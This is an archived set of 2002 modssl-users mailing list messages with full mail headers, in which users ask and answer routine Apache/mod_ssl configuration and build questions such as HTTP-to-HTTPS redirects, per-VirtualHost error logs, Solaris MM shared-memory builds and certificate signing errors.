Email: fkhan@fssc.co.uk ----------------------------------------------------------------- This message is for the designated recipient only and may contain privileged or confidential information. If you have received it in error, please notify the sender immediately and delete the=20 original. Any other use of the email by you is prohibited. ------_=_NextPart_001_01C1AFC0.C7CE960E Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable

Hi,

<= o:p> 

I= hope this is the correct forum for my query.

<= o:p> 

I= have installed apache with mod_ssl.  Briefly, I want all http requests = to a particular VirtualHost to be redirected to http= s for the same VirtualHost.  Do I use mod_= rewrite to do this?

<= o:p> 

I= have set up 4 VirtualHosts in the order:<= /span>

&= lt;VirtualHost a.com:80>

&= lt;VirtualHost b.com:80>

&= lt;VirtualHost c.com:80>

&= lt;VirtualHost d.com:443>

A= ll https= ://d.com requests work fine.  I want al= l http:/= /d.com to be redirected to https://d.com but they are defaultin= g to http:/= /a.com.

<= o:p> 

I= guess one solution might be to place the <VirtualHost d.com:443> container at the top of the VirtualHost<= /span> container list in httpd.conf but I want the gen= eral default to be a.com:80.

<= o:p> 

I thought this would be straightforward but I dunno how to do it.

<= o:p> 

A= ppreciate any help.  Cheers,<= /span>

<= o:p> 

= Farooq Khan

M= ob: +44 7771 981 946

E= mail: fkhan@fssc.co.uk



-----------------------------------------------------------------
This message is for the designated recipient only and may contain
privileged or confidential information. If you have received it
in error, please notify the sender immediately and delete the
original. Any other use of the email by you is prohibited.
 =00 ------_=_NextPart_001_01C1AFC0.C7CE960E-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 7 12:35:24 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA09766; Thu, 7 Feb 2002 12:34:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id MAA09748; Thu, 7 Feb 2002 12:33:47 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id MAA14215 for ; Thu, 7 Feb 2002 12:33:36 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma014172; Thu, 7 Feb 02 12:33:31 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id MAA28373 for ; Thu, 7 Feb 2002 12:33:31 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id MAA28895 for ; Thu, 7 Feb 2002 12:33:29 +0100 (MET) Message-ID: <3C626609.9E26049F@bourse.ch> Date: Thu, 07 Feb 2002 12:33:29 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Stop mod_ssl from writing errors to the general Apache error logfile References: <3C60177B.3FC32DA9@t-online.net> <3C60ECC9.677A8615@bourse.ch> <3C6173F3.51C8AC2D@t-online.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Bert Courtin wrote: > > Hi Owen, > > thank you for your reply:-) > > ... but - when sending the output for the ErrorLog to /dev/null I don't > have an ErrorLog at all, and that's not really what I needed.. > > I dont what no ErrorLog at all but just no SSL errors in my ErrorLog (even > inside the virtual host!). I don't see the point that if I set SSLLogLevel > to none that this only means that no dedicated SSL logging is done, but > messages of level ``error'' are still written to the general Apache error > logfile. > In my opinion there should be an option "quite" or "disabled" available > which turns off this behaviour. > > For me meanwhile I now playing around with piped logging using a statemend > like: > > ErrorLog "| /usr/bin/fgrep -v 'errno: 131' | /usr/bin/fgrep -v 'SSL > handshake interrupted by system' >> /var/log/apache_1.3.23/logs/error_log" I think you're missing a crucial point - you can have SEVERAL error_logs... You do not need to have just one ErrorLog directive, you can also have an ErrorLog inside a VH and it will receive log messages only from that VH. Since you need a separate VH for SSL, it is easy to put an extra ErrorLog directive inside the SSL VH and it will trap all the error messages generated by requests to that VH. So your config would look like: # Define default server-wide error_log ErrorLog logs/main_error_log # Declare SSL VH ... # Define special SSL_only error_log ErrorLog logs/SSL_error_log ... Then you will get TWO error_logs... and the main_error_log will not have any SSL errors in it. The thing about /dev/null was just if you wanted to ignore the logging - obviously you can replace /dev/null with a real file. NB - the same is true of TransferLog... Rgds, Owen Boyle PS If you haven't already done so, you might like to sign up for the Official Apache Users List: http://httpd.apache.org/userslist.html It is more appropriate for general config issues like this. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 7 12:38:21 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA09957; Thu, 7 Feb 2002 12:37:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id MAA09914; Thu, 7 Feb 2002 12:36:39 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id B68694CE74B; Thu, 7 Feb 2002 12:36:38 +0100 (CET) To: modssl-users@modssl.org Path: lmtp2nntp!not-for-mail From: Owen Boyle Newsgroups: en.list.modssl-users Subject: Re: Stop mod_ssl from writing errors to the general Apache error logfile Date: Thu, 07 Feb 2002 12:33:29 +0100 Organization: Engelschall Lines: 61 Message-ID: <3C626609.9E26049F@bourse.ch> References: <3C60177B.3FC32DA9@t-online.net> <3C60ECC9.677A8615@bourse.ch> <3C6173F3.51C8AC2D@t-online.net> NNTP-Posting-Host: visp.engelschall.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Trace: en4.engelschall.com 1013081798 7701 195.27.176.148 (7 Feb 2002 11:36:38 GMT) X-Complaints-To: visp@en4.engelschall.com NNTP-Posting-Date: Thu, 7 Feb 2002 11:36:38 +0000 (UTC) Delivered-To: list+modssl-users@list.engelschall.com X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Bert Courtin wrote: > > Hi Owen, > > thank you for your reply:-) > > ... but - when sending the output for the ErrorLog to /dev/null I don't > have an ErrorLog at all, and that's not really what I needed.. > > I dont what no ErrorLog at all but just no SSL errors in my ErrorLog (even > inside the virtual host!). I don't see the point that if I set SSLLogLevel > to none that this only means that no dedicated SSL logging is done, but > messages of level ``error'' are still written to the general Apache error > logfile. > In my opinion there should be an option "quite" or "disabled" available > which turns off this behaviour. > > For me meanwhile I now playing around with piped logging using a statemend > like: > > ErrorLog "| /usr/bin/fgrep -v 'errno: 131' | /usr/bin/fgrep -v 'SSL > handshake interrupted by system' >> /var/log/apache_1.3.23/logs/error_log" I think you're missing a crucial point - you can have SEVERAL error_logs... You do not need to have just one ErrorLog directive, you can also have an ErrorLog inside a VH and it will receive log messages only from that VH. Since you need a separate VH for SSL, it is easy to put an extra ErrorLog directive inside the SSL VH and it will trap all the error messages generated by requests to that VH. So your config would look like: # Define default server-wide error_log ErrorLog logs/main_error_log # Declare SSL VH ... # Define special SSL_only error_log ErrorLog logs/SSL_error_log ... Then you will get TWO error_logs... and the main_error_log will not have any SSL errors in it. The thing about /dev/null was just if you wanted to ignore the logging - obviously you can replace /dev/null with a real file. NB - the same is true of TransferLog... Rgds, Owen Boyle PS If you haven't already done so, you might like to sign up for the Official Apache Users List: http://httpd.apache.org/userslist.html It is more appropriate for general config issues like this. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 7 12:48:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA10469; Thu, 7 Feb 2002 12:47:23 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id MAA10424; Thu, 7 Feb 2002 12:46:53 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id MAA22662 for ; Thu, 7 Feb 2002 12:46:46 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma022569; Thu, 7 Feb 02 12:46:39 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id MAA01590 for ; Thu, 7 Feb 2002 12:46:38 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id MAA00115 for ; Thu, 7 Feb 2002 12:46:37 +0100 (MET) Message-ID: <3C62691D.87F841A6@bourse.ch> Date: Thu, 07 Feb 2002 12:46:37 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: directing http --> https References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users "Farooq Khan" writes: > I have installed apache with mod_ssl. Briefly, I want all http requests to a particular > VirtualHost to be redirected to https for the same VirtualHost. Do I use mod_rewrite to do > this? > > > > I have set up 4 VirtualHosts in the order: > > > > > > All https://d.com requests work fine. I want all http://d.com to be redirected to > https://d.com but they are defaulting to http://a.com. > The trouble is you haven't defined anything for requests on port 80 with ServerName = "d.com" so apache just serves the first port 80 VH it finds - in this case a.com. The solution is to create a small VH for d.com:80 and fill it with just a Redirect to the https site, e.g. ServerName d.com Redirect / https://d.com/ This will bounce any request to d.com to the top of the https site. If you want to be more specific so that http://d.com/foo/bar.html --> https://d.com/foo/bar.html then use something like: RedirectMatch (.*) https://d.com$1 Read the docs for these directives for more details. You can do a lot with redirects and you only need to use rewrites if things get really complicated. Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 7 12:51:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA10580; Thu, 7 Feb 2002 12:50:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id MAA10545; Thu, 7 Feb 2002 12:49:50 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 9BCD14CE738; Thu, 7 Feb 2002 12:49:50 +0100 (CET) To: modssl-users@modssl.org Path: lmtp2nntp!not-for-mail From: Owen Boyle Newsgroups: en.list.modssl-users Subject: directing http --> https Date: Thu, 07 Feb 2002 12:46:37 +0100 Organization: Engelschall Lines: 48 Message-ID: <3C62691D.87F841A6@bourse.ch> References: NNTP-Posting-Host: visp.engelschall.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Trace: en4.engelschall.com 1013082590 10252 195.27.176.148 (7 Feb 2002 11:49:50 GMT) X-Complaints-To: visp@en4.engelschall.com NNTP-Posting-Date: Thu, 7 Feb 2002 11:49:50 +0000 (UTC) Delivered-To: list+modssl-users@list.engelschall.com X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users "Farooq Khan" writes: > I have installed apache with mod_ssl. Briefly, I want all http requests to a particular > VirtualHost to be redirected to https for the same VirtualHost. Do I use mod_rewrite to do > this? > > > > I have set up 4 VirtualHosts in the order: > > > > > > All https://d.com requests work fine. I want all http://d.com to be redirected to > https://d.com but they are defaulting to http://a.com. > The trouble is you haven't defined anything for requests on port 80 with ServerName = "d.com" so apache just serves the first port 80 VH it finds - in this case a.com. The solution is to create a small VH for d.com:80 and fill it with just a Redirect to the https site, e.g. ServerName d.com Redirect / https://d.com/ This will bounce any request to d.com to the top of the https site. If you want to be more specific so that http://d.com/foo/bar.html --> https://d.com/foo/bar.html then use something like: RedirectMatch (.*) https://d.com$1 Read the docs for these directives for more details. You can do a lot with redirects and you only need to use rewrites if things get really complicated. Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 7 15:56:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA18759; Thu, 7 Feb 2002 15:55:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from photon.wildfalcon.com id PAA18729; Thu, 7 Feb 2002 15:54:31 +0100 (MET) Received: (qmail 24940 invoked by uid 500); 7 Feb 2002 14:57:59 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 7 Feb 2002 14:57:59 -0000 Date: Thu, 7 Feb 2002 14:57:59 +0000 (GMT) From: Laurie Young To: Subject: mod_ssl -> tomcat Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Laurie Young X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi I am using the following set up Apache (1.3.22) with mod_ssl 2.8.5 to secure a website some pages within that web site are actually java servlets run under Tomcat (4.0.1) via mod_webapp Apache and Tomcat are both running on the same machine So as I understand it what should happen is User connects to Apache via SSL (secure because its encrypted) Apache connects to Tomcat internally (sercure because it doesn't leave the machine - is this correct?) Tomcat runs the java pages to generate the html, sending it back to apache Apache send the html back to the user along the SSL connection I'm not 100% sure i'm right in saying that the connection between apache and tomcat is secure? Specifically when apache detects that it is sending a page that has come from a non-ssl source, it sends the browser a "insecure page" flag some how, which causes the brower (this happens in every browser) to try and access the page via http instead of https For example if I have a page https://www.test.com/webapp when webapp is a tomcat page the browser automatically attempts to access http://www.test.com/webapp which generates an apache generated error page "this page can only be viewed over https" if I then manually type in the "s" into the address now in the browsers address bar, then it will load the correct page. Is it possible (or even correct) to tell Apache that the Tomcat installation is safe, and to not send the insecure command to the browser? I need to use apache for SSL rather than the SSL in tomcat cause I need suppport for user certificates, which I believe tomcat does not offer Laurie -- ================================================== Laurie Robert Young laurie@wildfalcon.com | laurie@doc.ic.ac.uk www.wildfalcon.com | www.doc.ic.ac.uk/~laurie ICQ UIN #20194782 ================================================== ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 7 16:31:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA20503; Thu, 7 Feb 2002 16:30:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from qeo02001.t-online.net id QAA20469; Thu, 7 Feb 2002 16:29:51 +0100 (MET) Received: from qeo01007.da.t-online.net (qeo01007.da.t-online.net [192.168.197.4]) by qeo02001.t-online.net (8.9.3/8.9.3/Debian 8.9.3-21) with ESMTP id QAA21183 for ; Thu, 7 Feb 2002 16:29:45 +0100 Received: from qeo01006.da.t-online.net ([192.168.197.66]) by qeo01007.da.t-online.net (Netscape Messaging Server 4.15) with ESMTP id GR65PL02.45O for ; Thu, 7 Feb 2002 16:29:45 +0100 Received: from t-online.net ([192.168.193.21]) by qeo01006.da.t-online.net (Netscape Messaging Server 4.15) with ESMTP id GR65PL00.BBC for ; Thu, 7 Feb 2002 16:29:45 +0100 Message-ID: <3C629D69.33BE4580@t-online.net> Date: Thu, 07 Feb 2002 16:29:45 +0100 From: "Bert Courtin" Organization: T-Online International AG X-Sender: "Bert Courtin" X-Mailer: Mozilla 4.51 [de]C-CCK-MCD DTOS 1999062601 IT/DV NBE (WinNT; U) X-Accept-Language: de,en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Getting SSLMutex 'sem' and SSLSessionCache 'shm:/...' work on Solaris 8/SPARC References: <3C60177B.3FC32DA9@t-online.net> <3C60ECC9.677A8615@bourse.ch> <3C6173F3.51C8AC2D@t-online.net> <3C626609.9E26049F@bourse.ch> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Bert Courtin" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I'd like the httpd-configuration options SSLMutex 'sem' and SSLSessionCache 'shm:/...' getting to work on my Solaris 8/SPARC. Currently they are not supported/available by my apache build: httpd -L: ----------------------------------------- SSLMutex (mod_ssl.c) SSL lock for handling internal mutual exclusions (`none', `file:/path/to/file') Allowed in *.conf only outside , or SSLSessionCache (mod_ssl.c) SSL Session Cache storage (`none', `dbm:/path/to/file') Allowed in *.conf only outside , or ------------------------------------------- Questions: ---------- - Are these Options for SSLMutex (sem) / SSLSessionCache (shm) available on Solaris 8/SPARC? - How do I have to build mod_ssl / apache to get it work as I cannot find infos related to this anywhere (all I found was "supports xyz if the underlaying platform supports it" - does Solaris8/SPARC not support this?) Please find my current build/coinfiguration options at the end of this mail. Thanks in advance & kind regards, Bert Courtin Build-details: ------------- This is how I build my apache: #Preinstall APACHE # cd ${APACHE} ./configure --prefix=/${TARGET_DIR}/${APACHE}/${PROJEKT} cd .. # lib_mcrypt ... # mm-1.1.3 # cd ${MM} ./configure --prefix=/${TARGET_DIR}/${MM} \ --with-gcc \ --disable-shared \ --with-sem=IPCSEM \ --with-shm=IPCSHM make make install | tee -a "${THIS_LOGFILE}" cd .. # openSSL ... # imap support ... # openLDAP ... # mod_SSL # cd ${MODSSL} CPFLAGS="-I/${TARGET_DIR}/${OPENSSL}/include -I/${TARGET_DIR}/${MM}/include" \ LDFLAGS="-L/${TARGET_DIR}/${OPENSSL}/lib -L/${TARGET_DIR}/${MM}/lib" \ ./configure --prefix=/${TARGET_DIR}/${APACHE}/${PROJEKT} \ --with-apache=../${APACHE} \ --with-ssl=../${OPENSSL} \ --with-mm=../${MM} \ --disable-rule=SSL_COMPAT cd .. # MODPERL ... # APACHE # cd ${APACHE} EAPI_MM="../${MM}" \ CPFLAGS="-I/${TARGET_DIR}/${OPENSSL}/include -I/${TARGET_DIR}/${MM}/include" \ LDFLAGS="-L/${TARGET_DIR}/${OPENSSL}/lib -L/${TARGET_DIR}/${MM}/lib" \ INCLUDE="-I/${TARGET_DIR}/${OPENSSL}/include -I/${TARGET_DIR}/${MM}/include" \ ./configure --prefix=/${TARGET_DIR}/${APACHE}/${PROJEKT} \ --sysconfdir=/etc/${APACHE}/${PROJEKT} \ --disable-rule=EXPAT \ --disable-rule=SSL_COMPAT \ --activate-module=src/modules/php4/libphp4.a \ --enable-module=php4 \ --activate-module=src/modules/perl/libperl.a \ --enable-module=perl \ --enable-module=ssl \ --disable-module=status \ --disable-module=info \ --disable-module=example \ --disable-module=speling \ --disable-module=userdir \ make make install | tee -a "${THIS_LOGFILE}" cd .. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 7 17:39:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA23723; Thu, 7 Feb 2002 17:38:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from tsmtp4.mail.isp id RAA23694; Thu, 7 Feb 2002 17:37:21 +0100 (MET) Received: from mailhost.teleline.es ([217.127.178.10]) by tsmtp4.mail.isp (Netscape Messaging Server 4.15 tsmtp4 Jul 26 2001 13:10:38) with ESMTP id GR68TE00.NWG for ; Thu, 7 Feb 2002 17:36:50 +0100 Message-ID: <200202071737230000.013737FC@mailhost.teleline.es> In-Reply-To: <200202071624.RAA22996@opensource.ee.ethz.ch> References: <200202071624.RAA22996@opensource.ee.ethz.ch> X-Mailer: Calypso Version 3.30.00.00 (3) Date: Thu, 07 Feb 2002 17:37:23 +0100 From: =?us-ascii?Q?=22Jos=E9_Vicente_Carrasco_Vay=E1=22?= To: modssl-users@modssl.org Subject: Another one getting rid of Snake Oil stuff Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id RAA23720 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: =?us-ascii?Q?=22Jos=E9_Vicente_Carrasco_Vay=E1=22?= X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi: I´m new on the list. I have a horrible english (as you can see) but I can understand so good the english technical writings. I'm trying to install my true certificates. I've read the mod_ssl FAQ, an article on FreeBSDdiary.org (I uses FreeBSD 4.4) and specially the thread of Jan. 15th at this list. I've maked all the steps without problems until ./sign.sh server.csr I get the same exit that the Jan. 15th's user has. Do you remember? ---- snip --- The problem is that when I go to sign the csr, I get the following: 1 out of 1 certificate requests certified, commit? [y/n]y Write out database with 1 new entries Data Base Updated CA verifying: netmusician.crt <-> CA cert netmusician.crt: /C=US/ST=IN/L=Bloomington/O=Netmusician/CN=Netmusician/Email =joe@netmusician. org error 18 at 0 depth lookup:self signed certificate /C=US/ST=IN/L=Bloomington/O=Netmusician/CN=Netmusician/Email =joe@netmusician. org error 7 at 0 depth lookup:certificate signature failure ---- snip ---- Please, help me. I've read all the docs that I've found and there are anybody to make a question. Thanks a lot and excuse again my pseudo-english. ///////////////////\\\\\\\\\\\\\\\\\\\\\\ "sedatio et tranquilitas" \\\\\\\\\\\\\\\\\\\///////////////////// ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 7 18:14:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA26442; Thu, 7 Feb 2002 18:13:16 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from owl4.owl.co.uk id SAA26413; Thu, 7 Feb 2002 18:12:38 +0100 (MET) Received: from owl.co.uk (ferret.owl.co.uk [192.168.150.61]) by owl4.owl.co.uk (Rockliffe SMTPRA 3.4.2) with ESMTP id for ; Thu, 7 Feb 2002 17:13:43 +0000 Message-ID: <3C62B4BD.9080307@owl.co.uk> Date: Thu, 07 Feb 2002 17:09:17 +0000 From: Colm McCartan Organization: OWL User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.4) Gecko/20011019 Netscape6/6.2 X-Accept-Language: en-us MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: mod_ssl -> tomcat References: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Colm McCartan X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > I need to use apache for SSL rather than the SSL in tomcat cause I need > suppport for user certificates, which I believe tomcat does not offer I'm not sure thats true, have you looked at: http://xml.apache.org/soap/docs/install/FAQ_Tomcat_SOAP_SSL.html and the tomcat docs? ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 7 19:32:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA00193; Thu, 7 Feb 2002 19:31:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id TAA00151; Thu, 7 Feb 2002 19:30:08 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id D2864BD2B; Thu, 7 Feb 2002 19:30:09 +0100 (CET) Date: Thu, 7 Feb 2002 19:30:09 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Getting SSLMutex 'sem' and SSLSessionCache 'shm:/...' work on Solaris 8/SPARC Message-ID: <20020207183009.GA9123@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <3C60177B.3FC32DA9@t-online.net> <3C60ECC9.677A8615@bourse.ch> <3C6173F3.51C8AC2D@t-online.net> <3C626609.9E26049F@bourse.ch> <3C629D69.33BE4580@t-online.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3C629D69.33BE4580@t-online.net> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, Feb 07, 2002 at 04:29:45PM +0100, Bert Courtin wrote: > Questions: > ---------- > - Are these Options for SSLMutex (sem) / SSLSessionCache (shm) available on > Solaris 8/SPARC? yes. I never build mod_ssl on Solaris without it. > - How do I have to build mod_ssl / apache to get it work as I cannot find infos > related to this anywhere It is in the INSTALL document - basically you enable them by compiling the MM- library and configuring mod_ssl with the --with-mm option. The only difference between what you're doing with mm and my default build is that you add three options that I don't use: --with-gcc --with-sem=IPCSEM --with-shm=IPCSHM vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 7 20:32:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA03559; Thu, 7 Feb 2002 20:31:40 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id UAA03536; Thu, 7 Feb 2002 20:30:52 +0100 (MET) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 7 Feb 2002 11:18:47 -0800 Received: from 156.153.254.2 by lw11fd.law11.hotmail.msn.com with HTTP; Thu, 07 Feb 2002 19:18:47 GMT X-Originating-IP: [156.153.254.2] From: "Edward Wong" To: modssl-users@modssl.org Subject: Re: modssl/apache2 compile problems Date: Thu, 07 Feb 2002 11:18:47 -0800 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 07 Feb 2002 19:18:47.0568 (UTC) FILETIME=[44563100:01C1B00C] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Edward Wong" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Could you be a little more specific as to how I would skip the lex/flex portion in your workaround? Is it something I need to do in MSVC++, or somewhere else? --Ed >From: Leo Baschy >Reply-To: modssl-users@modssl.org >To: modssl-users@modssl.org >Subject: Re: modssl/apache2 compile problems >Date: Sat, 02 Feb 2002 04:57:42 -0800 > >Sounds similar to my problem building that under Windows. Using cygwin. >Using the Visual C++ dsw/dsp projects. Rest of Apache 2.0.28 builds fine. >Have put in openssl etc. (Previously on same machine have successfully >built 1.3.20 with mod_ssl, still do.) > >The problem is specific to lex, specifically flex, processing > lex.ssl_expr_yy.c(1753) : error C2143: syntax error : missing ')' >before 'constant' > >That seems to indicate there is a file ssl_expr_scan.l which is being used >to generate ssl_expr_scan.c and that generation doesn't work right. The .c >file fails to compile. > >A temporary workaround seems to be to skip lex/flex use the ssl_expr_scan.c >file that comes with 2.0.28, but I have no idea whether that might actually >be an (older) incorrect version then. > >Anyone willing to tinker with (or knowledgable about) versions of lex? > >Can ssl_expr_scan.l be fine tuned to make this work again? > >- Leo Baschy > >At 06:02 PM 1/31/02 -0500, Ed Wong wrote: > >Generating Code... > > link.exe @C:\DOCUME~1\edwon\LOCALS~1\Temp\nmb02172. > > Creating library .\Debug\mod_ssl.lib and object .\Debug\mod_ssl.exp > >ssl_expr.obj : error LNK2001: unresolved external symbol >_ssl_expr_yyparse > >ssl_expr_scan.obj : error LNK2001: unresolved external symbol > >_ssl_expr_yylval > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org _________________________________________________________________ Join the world’s largest e-mail service with MSN Hotmail. http://www.hotmail.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org 